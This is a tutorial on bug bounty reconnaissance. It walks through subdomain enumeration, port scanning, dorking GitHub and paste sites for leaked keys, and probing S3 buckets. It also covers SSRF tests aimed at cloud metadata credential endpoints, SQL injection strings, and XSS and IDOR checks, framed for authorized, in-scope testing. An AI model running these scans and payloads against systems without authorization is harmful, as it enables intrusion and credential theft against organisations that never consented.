Introduction
The cybersecurity community has repeatedly shown that proper reconnaissance is the difference between finding duplicate low-severity bugs and uncovering critical vulnerabilities worth thousands of dollars. Successful bug bounty hunters often report spending the bulk of their time, by some estimates around 70%, on reconnaissance rather than exploitation. This comprehensive guide explores the methodologies, tools, and strategies used by top researchers to discover vulnerabilities through systematic reconnaissance.
The Reconnaissance Mindset
Most security researchers fail not because they lack technical skills, but because they skip crucial reconnaissance phases. They rush into automated scanning, missing hidden assets like abandoned subdomains, forgotten acquisitions, misconfigured cloud storage, and exposed APIs. The bugs with the highest payouts often reside in assets that other hunters never discover.
Key Principles
- Passive reconnaissance should precede active testing - Gather maximum intelligence before sending any exploits
- Thoroughness beats speed initially - Comprehensive asset discovery leads to more unique findings
- Automation should enhance, not replace, manual analysis - Automated tools are force multipliers, not substitutes
- Context matters - Understanding what a company does helps identify likely vulnerability classes
Phase 1: Asset Discovery - Mapping the Attack Surface
1.1 Subdomain Enumeration
Most hunters only examine the primary domain, but the real goldmine lies in subdomains. Companies often have hundreds or thousands of subdomains, many forgotten or poorly maintained.
Essential Techniques:
Certificate Transparency Logs:
# Using crt.sh
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u
# Using subfinder
subfinder -d target.com -o subdomains.txt
# Using amass
amass enum -passive -d target.com -o amass_results.txt
DNS Enumeration:
# Using dnsgen for permutation
cat subdomains.txt | dnsgen - | massdns -r resolvers.txt -o S -w resolved.txt
# Using altdns for alterations
altdns -i subdomains.txt -o data_output -w words.txt -r -s results_output.txt
Shodan and Censys Integration:
These platforms index internet-connected devices and can reveal unexpected assets through certificate analysis, favicon hashes, and technology fingerprinting.
# Shodan query examples
ssl.cert.subject.cn:"target.com"
http.favicon.hash:HASH_VALUE
# Censys certificate search
# Navigate to censys.io and search for target domain
# Extract all certificate SANs (Subject Alternative Names)
Key Strategy: Certificate-based queries frequently uncover IP addresses hosting multiple applications. Always verify whether discovered IPs fall within the bug bounty program scope before testing.
1.2 Acquisitions and Company Infrastructure Research
Autonomous System Number (ASN) Discovery:
Understanding a company's network infrastructure reveals IP ranges that can be scanned directly.
# Using ipinfo.io
curl ipinfo.io/AS<ASN_NUMBER>
# Using hostinfo.io
# Query for network ranges associated with the target
# Scan discovered ranges
nmap -sV -T3 -Pn -p 2075,2076,6443,3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,10000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7077,4040,9000,8089,443,7447,7080,8880,8983,5673,7443,19000,19080 target_range
Corporate Research:
- Review SEC filings and investor relations pages for recent acquisitions
- Acquired companies often maintain separate infrastructure with different security postures
- Search for company mentions in news articles about partnerships or mergers
1.3 Historical Data Mining
Wayback Machine:
Archived copies of deleted pages often expose endpoints or sensitive information that developers believed was removed.
# Using waybackurls
waybackurls target.com | tee wayback_urls.txt
# Using gau (Get All URLs)
gau target.com | tee all_urls.txt
# Filter for interesting endpoints
cat wayback_urls.txt | grep -E "\.(js|json|xml|conf|config|bak|backup|swp|old|db|sql)"
GitHub and Code Repository Scanning:
Developers frequently commit sensitive data to public repositories.
# GitHub dorking queries
org:target_org "api_key"
org:target_org "password"
org:target_org "secret"
org:target_org "token"
user:target_user "aws_access_key_id"
# Using tools
trufflehog --regex --entropy=True https://github.com/target/repo
gitleaks --repo-url=https://github.com/target/repo
Pastebin and Similar Services:
Search for:
- Database dumps
- Configuration files
- API credentials
- Internal documentation leaks
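These leaks can often be located with simple search-engine dorks; a few illustrative queries (domain and paste-site names are generic examples, and hits are not guaranteed):
# Example dorks for paste-site leaks
site:pastebin.com "target.com"
site:pastebin.com "target.com" password OR api_key
site:paste.ee OR site:justpaste.it "target.com"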
Phase 2: Technology Stack and Fingerprinting
2.1 Service Identification
# Port scanning with service detection
nmap -sV -sC -p- target.com -oA nmap_scan
# Fast port scanning with rustscan
rustscan -a target.com -- -A -sC
# HTTP technology fingerprinting
whatweb target.com
wappalyzer target.com
2.2 JavaScript Analysis
JavaScript files contain treasure troves of information including API endpoints, authentication logic, and hidden functionality.
# Extract JS files
gospider -s https://target.com -c 10 -d 2 --js > js_files.txt
# Analyze JS for endpoints and secrets
cat js_files.txt | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u
# Using LinkFinder
python3 linkfinder.py -i https://target.com/app.js -o results.html
# Extract API endpoints
cat js_files.txt | grep -Eo "api/v[0-9]/[a-zA-Z0-9/_-]*"
2.3 Cloud Storage Discovery
# AWS S3 buckets
aws s3 ls s3://target-company-name --no-sign-request
aws s3 ls s3://target-company-backups --no-sign-request
# Common bucket naming patterns
company-name-backups
company-name-logs
company-name-uploads
company-name-assets
company-name-prod
company-name-dev
Google Cloud Storage:
https://storage.googleapis.com/company-name-bucket/
Azure Blob Storage:
https://companyname.blob.core.windows.net/
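The naming patterns above can be probed unauthenticated from the command line. A minimal sketch, assuming a patterns.txt file that holds the candidate bucket names listed earlier (one per line):
# Check each candidate name against S3 and Google Cloud Storage
# (404 generally means the bucket does not exist; 200 or 403 means it exists and deserves a closer look)
while read bucket; do
  curl -s -o /dev/null -w "S3  $bucket -> %{http_code}\n" "https://$bucket.s3.amazonaws.com/"
  curl -s -o /dev/null -w "GCS $bucket -> %{http_code}\n" "https://storage.googleapis.com/$bucket/"
done < patterns.txt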
Phase 3: Content Discovery and Endpoint Mapping
3.1 Directory and File Bruteforcing
# Using ffuf (Fast web fuzzer)
ffuf -w wordlist.txt -u https://target.com/FUZZ -mc 200,301,302,403
# Using dirsearch
dirsearch -u https://target.com -e php,html,js,txt,zip -x 404,500
# Recursive discovery
feroxbuster -u https://target.com -w wordlist.txt -x js,php,txt,json -r
High-Value Targets:
/admin, /admin-panel, /administrator
/api, /api/v1, /api/v2
/backup, /backups, /.backup
/config, /.config, /configuration
/debug, /test, /dev
/graphql, /graphiql
/.git, /.svn, /.env
/swagger, /api-docs
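These paths can be swept across every live host with a small custom wordlist. A minimal sketch, assuming high_value_paths.txt contains the paths above (one per line) and live_subs.txt holds the live hosts found during asset discovery:
# Sweep all live hosts for the high-value paths
while read host; do
  safe_name=$(echo "$host" | sed 's|https\?://||; s|/|_|g')   # make the host safe to use in a filename
  ffuf -w high_value_paths.txt -u "$host/FUZZ" -mc 200,301,302,401,403 -o "ffuf_highvalue_${safe_name}.json"
done < live_subs.txt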
3.2 Parameter Discovery
# Using Arjun
arjun -u https://target.com/endpoint
# Using ParamSpider
python3 paramspider.py --domain target.com
# Parameter mining from archived URLs
cat wayback_urls.txt | grep "?" | cut -d"?" -f2 | cut -d"=" -f1 | sort -u > parameters.txt3.3 Virtual Host Discovery
# Using ffuf for vhost discovery
ffuf -w vhosts.txt -u https://target.com -H "Host: FUZZ.target.com" -mc 200
# Manual testing
curl -H "Host: internal.target.com" https://target.comPhase 4: Vulnerability-Specific Reconnaissance
4.1 SSRF (Server-Side Request Forgery) Discovery
Look for functionality that:
- Fetches external URLs (webhooks, URL validation, PDF generators)
- Imports files from URLs
- Performs server-side rendering
- Integrates with external services
Common SSRF Endpoints:
/api/fetch?url=
/download?file=
/proxy?url=
/import?source=
/webhook?callback=
/pdf/generate?url=
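A quick way to triage candidate parameters is to point them at a host you control and watch for an inbound HTTP or DNS request. A minimal sketch, assuming an out-of-band listener you operate (your own VPS, a Burp Collaborator domain, or similar) and candidate URLs collected in ssrf_candidates.txt, each ending in a URL-type parameter:
# Tag each request so a hit in the listener logs can be traced back to the URL that caused it
LISTENER="https://your-oob-listener.example.com"   # placeholder: a host whose logs you can read
while read url; do
  tag=$(echo "$url" | md5sum | cut -c1-8)
  curl -s -o /dev/null "${url}${LISTENER}/${tag}"
done < ssrf_candidates.txt
# Any request arriving at the listener carrying one of the tags shows the server fetched the supplied URL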
Cloud Metadata Endpoints:
# AWS
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Google Cloud
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-01
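Note that the Google Cloud and Azure endpoints only answer requests carrying a specific header (AWS IMDSv1 does not require one), so an SSRF that cannot influence request headers may fail against them even when they are reachable. For reference, the direct requests look like this:
# GCP requires the Metadata-Flavor header, Azure requires the Metadata header
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/"
curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"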
4.2 XSS (Cross-Site Scripting) Reconnaissance
Identify Input Reflection Points:
# Using dalfox
dalfox url https://target.com/search?q=test
# Manual testing for reflection
echo "test123unique" | while read url; do
curl -s "$url" | grep -i "test123unique" && echo "Reflected: $url"
doneJavaScript Event Handlers: Look for user input in:
- Event handler attributes: onclick, onerror, onload
- JavaScript template literals
- DOM-based sinks: innerHTML, document.write, eval
4.3 Authentication and Authorization Issues
Common Weak Points:
- Password reset functionality (token entropy, expiration)
- OAuth implementation (redirect_uri manipulation, state parameter)
- JWT tokens (algorithm confusion, weak secrets; see the decode sketch after this list)
- API key exposure (client-side JavaScript, mobile apps)
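For the JWT point above, a good first step is decoding the header and payload, which are only base64url-encoded rather than encrypted, to inspect the alg value and the claims. A minimal sketch; the token is a placeholder:
# Decode a JWT's header and payload (substitute a real token captured during testing)
JWT="eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjMifQ.signature"
for i in 1 2; do
  part=$(echo "$JWT" | cut -d. -f"$i" | tr '_-' '/+')
  pad=$(( (4 - ${#part} % 4) % 4 ))                                  # restore stripped base64 padding
  printf '%s%s' "$part" "$(printf '%*s' "$pad" '' | tr ' ' '=')" | base64 -d
  echo
done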
CSRF Token Analysis:
# Test for CSRF vulnerabilities
# 1. Remove token completely
# 2. Use empty token value
# 3. Change POST to GET
# 4. Use another user's token
# 5. Use same token for multiple accounts
4.4 IDOR (Insecure Direct Object Reference) Hunting
High-Value Endpoints:
/api/user/{id}
/profile/{username}
/document/{document_id}
/invoice/{invoice_id}
/order/{order_id}
Testing Methodology:
- Create two test accounts
- Identify sequential or guessable identifiers
- Attempt cross-account access (see the sketch after this list)
- Test with modified UUIDs (if predictable patterns exist)
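A minimal sketch of the cross-account check, assuming two test accounts and a handful of resource IDs known to belong to the first account (cookie values, IDs, and the endpoint are placeholders):
# Request the first account's resources using the second account's session
SESSION_B="session=BBBB"                     # placeholder: session cookie of the non-owning account
for id in 1001 1002 1003; do                 # placeholder IDs owned by the first account
  code=$(curl -s -o /dev/null -w "%{http_code}" -H "Cookie: $SESSION_B" "https://target.com/api/user/$id")
  echo "id=$id -> $code"                     # a 200 on someone else's resource is a candidate IDOR; verify the body manually
done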
4.5 SQL Injection Recon
Parameter Identification:
# Using sqlmap for initial detection
sqlmap -u "https://target.com/page?id=1" --batch --random-agent
# Manual testing
' OR '1'='1
" OR "1"="1
1' ORDER BY 1--
1' UNION SELECT NULL--
Error-Based Discovery: Intentionally trigger errors to leak database information:
' (single quote)
" (double quote)
\ (backslash)
; (semicolon)
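A minimal sketch for spraying these characters at a parameter and watching for database error signatures (the URL, parameter, and error patterns are illustrative, not exhaustive):
# Send each error-triggering character URL-encoded and grep responses for common SQL error strings
for payload in "'" '"' '\' ';'; do
  curl -s --get "https://target.com/page" --data-urlencode "id=1${payload}" \
    | grep -Eiq "sql syntax|sqlstate|unclosed quotation|ORA-[0-9]{5}|pg_query" \
    && echo "Possible SQL error triggered by: 1${payload}"
done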
Phase 5: Advanced Reconnaissance Techniques
5.1 Mobile Application Analysis
APK/IPA Extraction:
# Decompile Android APK
apktool d application.apk -o output_directory
# Extract strings for URLs and API keys
strings application.apk | grep -E "(http|https|api|key|token)"
# Using MobSF
# Upload APK to Mobile Security Framework for automated analysis
5.2 API Reconnaissance
API Documentation Discovery:
/swagger.json, /swagger-ui
/api/docs, /api-docs
/openapi.json
/graphql, /graphiql
GraphQL Introspection:
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      name
      fields {
        name
        type {
          name
          kind
        }
      }
    }
  }
}
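If a GraphQL endpoint is found, the introspection query can be sent directly as JSON; a minimal sketch (the /graphql path is an assumption, adjust to whatever content discovery revealed):
# A schema object in the response means introspection is enabled
curl -s -X POST "https://target.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{"query":"{ __schema { queryType { name } types { name } } }"}' | jq .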
5.3 Automated Vulnerability Scanning
While automation shouldn't be your primary method, it's effective for quickly triaging newly discovered assets.
# Using nuclei with custom templates
nuclei -l targets.txt -t nuclei-templates/ -severity critical,high
# Custom template groups
nuclei -l targets.txt -t nuclei-templates/cves/
nuclei -l targets.txt -t nuclei-templates/exposures/
# Using httpx for quick probing
cat subdomains.txt | httpx -silent -status-code -title -tech-detect -o probed.txt
Phase 6: Organization and Tracking
6.1 Documentation Strategy
Maintain detailed records of:
- Discovered assets and their status (in-scope/out-of-scope)
- Technologies identified on each asset
- Interesting parameters and endpoints
- Potential vulnerabilities noted
- Attack surface changes over time
Recommended Tools:
- Notion or Obsidian for note-taking
- Excel/Google Sheets for asset tracking
- Burp Suite project files for HTTP history
- Screenshots for evidence preservation
6.2 Continuous Monitoring
#!/bin/bash
TARGET="target.com"
OLD_SUBS="old_subdomains.txt"
NEW_SUBS="new_subdomains.txt"
# Run subdomain enumeration
subfinder -d $TARGET -silent | sort -u > $NEW_SUBS
# Compare with previous results
diff $OLD_SUBS $NEW_SUBS | grep ">" | cut -d" " -f2 > new_findings.txt
# Notify if new subdomains found
if [ -s new_findings.txt ]; then
echo "New subdomains discovered:"
cat new_findings.txt
fi
# Update old file
cp $NEW_SUBS $OLD_SUBS
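To run this on a schedule, a crontab entry along these lines works (script and log paths are placeholders):
# Run the subdomain monitor every morning at 06:00 and append output to a log
0 6 * * * /home/user/recon/monitor_subdomains.sh >> /home/user/recon/monitor.log 2>&1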
Common Pitfalls and How to Avoid Them
1. Tool Over-Reliance
Problem: Running automated scanners without understanding targets leads to duplicates. Solution: Use automation to supplement manual analysis, not replace it.
2. Insufficient Scope Understanding
Problem: Testing out-of-scope assets wastes time and can cause legal issues. Solution: Always verify scope before testing. Maintain an updated scope document.
3. Surface-Level Recon
Problem: Only checking obvious assets misses hidden vulnerabilities. Solution: Dedicate the bulk of your time to reconnaissance and go several layers deep.
4. Poor Time Management
Problem: Spending too long on one aspect while neglecting others. Solution: Create a structured checklist and allocate time proportionally.
5. Inadequate Documentation
Problem: Forgetting what was already tested or losing track of findings. Solution: Document everything in real-time. Create reproducible testing notes.
Practical Workflow Example
Here's a condensed workflow for approaching a new target:
# Day 1: Initial Asset Discovery (4-6 hours)
subfinder -d target.com -o subs.txt
amass enum -passive -d target.com -o amass_subs.txt
cat subs.txt amass_subs.txt | sort -u | httpx -silent > live_subs.txt
# Day 2: Deep Enumeration (4-6 hours)
cat live_subs.txt | nuclei -t nuclei-templates/exposures/ -severity medium,high,critical
gospider -S live_subs.txt -c 10 -d 3 --js -o spider_results
waybackurls target.com | tee wayback.txt
# Day 3: Technology and Endpoint Mapping (4-6 hours)
cat live_subs.txt | while read url; do
  whatweb "$url"
  # Strip the scheme so the ffuf output filename contains no slashes
  ffuf -w wordlist.txt -u "$url/FUZZ" -mc 200,301,403 -o "ffuf_$(echo "$url" | sed 's|https\?://||; s|/|_|g').txt"
done
# Day 4: Manual Testing Focus (6-8 hours)
# Focus on interesting findings from previous days
# Test authentication mechanisms
# Analyze JavaScript files
# Check for business logic flaws
# Ongoing: Continuous Monitoring
# Set up cron jobs for subdomain monitoring
# Subscribe to bug bounty program updates
# Track new features and changes
Advanced Tips from Top Researchers
- Focus on Acquisitions: Recently acquired companies often have integration issues and forgotten infrastructure.
- Monitor Certificate Transparency Logs: Set up alerts for new certificates issued for your target domains (see the sketch after this list).
- Analyze Competitors: If multiple programs exist in the same industry, reconnaissance on one can inform testing on another.
- Study Past Disclosed Reports: Public bug bounty reports reveal what worked. Learn from others' techniques.
- Build Custom Wordlists: Generic wordlists miss context-specific endpoints. Create industry and company-specific lists.
- Test Edge Cases: Unconventional inputs often bypass security controls (Unicode, null bytes, long inputs).
- Correlation is Key: A low-severity finding combined with another can become critical (CSRF + account takeover).
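The certificate-transparency tip above can be automated with a simple poll of crt.sh, reusing the query from Phase 1 and diffing against the previous run (file names are placeholders):
# Pull current certificate names and report anything not seen on the previous run
touch ct_seen.txt
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u > ct_current.txt
comm -13 ct_seen.txt ct_current.txt > ct_new.txt    # lines present only in the current pull
[ -s ct_new.txt ] && { echo "New certificate names:"; cat ct_new.txt; }
cp ct_current.txt ct_seen.txt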
Conclusion
Effective reconnaissance is not about running the most tools or spending the longest time. It's about systematic, thoughtful information gathering that uncovers assets and vulnerabilities others miss. The researchers finding critical bugs worth thousands of dollars aren't necessarily more skilled at exploitation; they're better at reconnaissance.
Success in bug bounty hunting comes from:
- Patience - Thorough recon takes time but pays off
- Methodology - Systematic approaches prevent oversight
- Persistence - Keep digging when others stop
- Creativity - Think beyond automated tools
- Documentation - Track everything for future reference
Remember that reconnaissance is an iterative process. As applications evolve, new assets appear, and security postures change. Continuous monitoring and re-reconnaissance of previously tested targets can yield new findings.
The difference between a mediocre bug bounty hunter and a top performer is often just reconnaissance depth. Master this phase, and the exploitation becomes significantly easier.
Resources for Further Learning
Tools:
- Subfinder, Amass (subdomain enumeration)
- httpx, nuclei (HTTP probing and scanning)
- ffuf, feroxbuster (content discovery)
- Burp Suite (web application testing)
- git-secrets, trufflehog (credential scanning)
Platforms:
- HackerOne, Bugcrowd (bug bounty platforms)
- Shodan, Censys (internet-wide scanning)
- crt.sh (certificate transparency logs)
- GitHub, GitLab (code repository searching)
Communities:
- Twitter #bugbountytips
- Reddit r/bugbounty
- Discord bug bounty servers
- Conference talks (DEF CON, Black Hat, BSides)
Start with one target, follow this methodology systematically, and document your process. Over time, you'll develop intuition for where vulnerabilities hide and build your own enhanced reconnaissance workflow.